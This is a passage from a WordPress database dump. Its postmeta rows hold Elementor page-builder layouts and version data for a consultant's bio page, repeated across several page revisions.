",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\">With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[{\"id\":\"dd31a12\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"cards\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_data\":[\"date\"],\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":false}]'),
(2923,671,'_elementor_pro_version','3.11.7'),
(2924,672,'_elementor_edit_mode','builder'),
(2925,672,'_elementor_template_type','wp-page'),
(2926,672,'_elementor_version','3.12.1'),
(2927,672,'_wp_page_template','default'),
(2928,672,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":30}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\">With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=primary\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70}},\"elements\":[{\"id\":\"dd31a12\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"cards\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_data\":[\"date\"],\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"cards_columns\":\"1\",\"cards_posts_per_page\":3},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":false}]'),
(2930,672,'_elementor_pro_version','3.11.7'),
(2935,673,'_elementor_is_screenshot','1'),
(2936,673,'_wp_attached_file','elementor/screenshots/Elementor-post-screenshot_388_2023-05-01-15-31-39_6ffb1b0d.png'),
(2942,675,'_elementor_edit_mode','builder'),
(2943,675,'_elementor_template_type','wp-page'),
(2944,675,'_elementor_version','3.12.1'),
(2945,675,'_wp_page_template','default'),
(2946,675,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":30}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\">With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=primary\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70}},\"elements\":[{\"id\":\"dd31a12\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"cards\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_data\":[\"date\"],\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"cards_columns\":\"1\",\"cards_posts_per_page\":3},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":false}]'),
(2948,675,'_elementor_pro_version','3.12.3'),
(2950,676,'_elementor_edit_mode','builder'),
(2951,676,'_elementor_template_type','wp-page'),
(2952,676,'_elementor_version','3.12.1'),
(2953,676,'_wp_page_template','default'),
(2954,676,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":30}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\">With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=primary\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70}},\"elements\":[{\"id\":\"dd31a12\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"cards\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_data\":[\"date\"],\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"cards_columns\":\"1\",\"cards_posts_per_page\":3},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":false}]'),
(2956,676,'_elementor_pro_version','3.12.3'),
(2958,647,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(2959,677,'_elementor_edit_mode','builder'),
(2960,677,'_elementor_template_type','wp-page'),
(2961,677,'_elementor_version','3.12.1'),
(2962,677,'_wp_page_template','default'),
(2963,677,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":30}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\">With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=primary\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70}},\"elements\":[{\"id\":\"dd31a12\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"cards\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_data\":[\"date\"],\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"cards_columns\":\"1\",\"cards_posts_per_page\":3},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":false}]'),
(2965,677,'_elementor_pro_version','3.12.3'),
(2967,677,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(2969,678,'_elementor_edit_mode','builder'),
(2970,678,'_elementor_template_type','wp-page'),
(2971,678,'_elementor_version','3.12.1'),
(2972,678,'_wp_page_template','default'),
(2973,678,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":30}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\">With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=primary\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70}},\"elements\":[{\"id\":\"dd31a12\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"cards\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_data\":[\"date\"],\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"cards_columns\":\"1\",\"cards_posts_per_page\":3},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":false}]'),
(2975,678,'_elementor_pro_version','3.12.3'),
(2976,678,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(2978,679,'_elementor_edit_mode','builder'),
(2979,679,'_elementor_template_type','wp-page'),
(2980,679,'_elementor_version','3.12.1'),
(2981,679,'_wp_page_template','default'),
(2982,679,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":30}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\">With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=primary\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70}},\"elements\":[{\"id\":\"dd31a12\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"cards\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_data\":[\"date\"],\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"cards_columns\":\"1\",\"cards_posts_per_page\":3},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":false}]'),
(2984,679,'_elementor_pro_version','3.12.3'),
(2985,679,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(2987,680,'_elementor_edit_mode','builder'),
(2988,680,'_elementor_template_type','wp-page'),
(2989,680,'_elementor_version','3.12.1'),
(2990,680,'_wp_page_template','default'),
(2991,680,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":30}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\">With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=primary\"},\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70}},\"elements\":[{\"id\":\"dd31a12\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"cards\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_data\":[\"date\"],\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"cards_columns\":\"1\",\"cards_posts_per_page\":3},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":false}]'),
(2993,680,'_elementor_pro_version','3.12.3'),
(2994,680,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(2997,681,'_elementor_source','post'),
(2998,681,'_elementor_edit_mode','builder'),
(2999,681,'_elementor_template_type','single-post'),
(3000,681,'_elementor_version','3.12.1'),
(3001,681,'_elementor_pro_version','3.12.3'),
(3002,681,'_edit_lock','1682956559:2'),
(3003,682,'_elementor_source','post'),
(3004,682,'_elementor_edit_mode','builder'),
(3005,682,'_elementor_template_type','single-post'),
(3006,682,'_elementor_version','3.12.1'),
(3007,682,'_elementor_pro_version','3.12.3'),
(3008,681,'_wp_page_template','default'),
(3009,681,'_elementor_data','[{\"id\":\"69ab661\",\"elType\":\"container\",\"settings\":[],\"elements\":[{\"id\":\"ed102a1\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"text_shadow_text_shadow\":{\"horizontal\":10,\"vertical\":0,\"blur\":76,\"color\":\"#FFFFFF\"},\"_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"_background_background\":\"classic\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"__globals__\":{\"title_color\":\"globals\\/colors?id=primary\",\"_background_color\":\"globals\\/colors?id=secondary\"}},\"elements\":[],\"widgetType\":\"theme-post-title\"}],\"isInner\":false},{\"id\":\"623f01c\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"__globals__\":{\"background_color\":\"globals\\/colors?id=text\"}},\"elements\":[{\"id\":\"a77a541\",\"elType\":\"widget\",\"settings\":{\"__globals__\":{\"text_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"theme-post-content\"}],\"isInner\":false}]'),
(3010,683,'_elementor_source','post'),
(3011,683,'_elementor_edit_mode','builder'),
(3012,683,'_elementor_template_type','single-post'),
(3013,683,'_elementor_version','3.12.1'),
(3014,683,'_elementor_pro_version','3.12.3'),
(3015,683,'_wp_page_template','default'),
(3016,683,'_elementor_data','[{\"id\":\"69ab661\",\"elType\":\"container\",\"settings\":[],\"elements\":[{\"id\":\"ed102a1\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"text_shadow_text_shadow\":{\"horizontal\":10,\"vertical\":0,\"blur\":76,\"color\":\"#FFFFFF\"},\"_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"_background_background\":\"classic\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"__globals__\":{\"title_color\":\"globals\\/colors?id=primary\",\"_background_color\":\"globals\\/colors?id=secondary\"}},\"elements\":[],\"widgetType\":\"theme-post-title\"}],\"isInner\":false},{\"id\":\"623f01c\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"__globals__\":{\"background_color\":\"globals\\/colors?id=text\"}},\"elements\":[{\"id\":\"a77a541\",\"elType\":\"widget\",\"settings\":{\"__globals__\":{\"text_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"theme-post-content\"}],\"isInner\":false}]'),
(3018,681,'_elementor_conditions','a:1:{i:0;s:21:\"include/singular/post\";}'),
(3020,684,'_elementor_edit_mode','builder'),
(3021,684,'_elementor_template_type','wp-page'),
(3022,684,'_elementor_version','3.12.1'),
(3023,684,'_wp_page_template','default'),
(3024,684,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":30}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\">With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=primary\"},\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70}},\"elements\":[{\"id\":\"dd31a12\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"cards\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_data\":[\"date\"],\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next 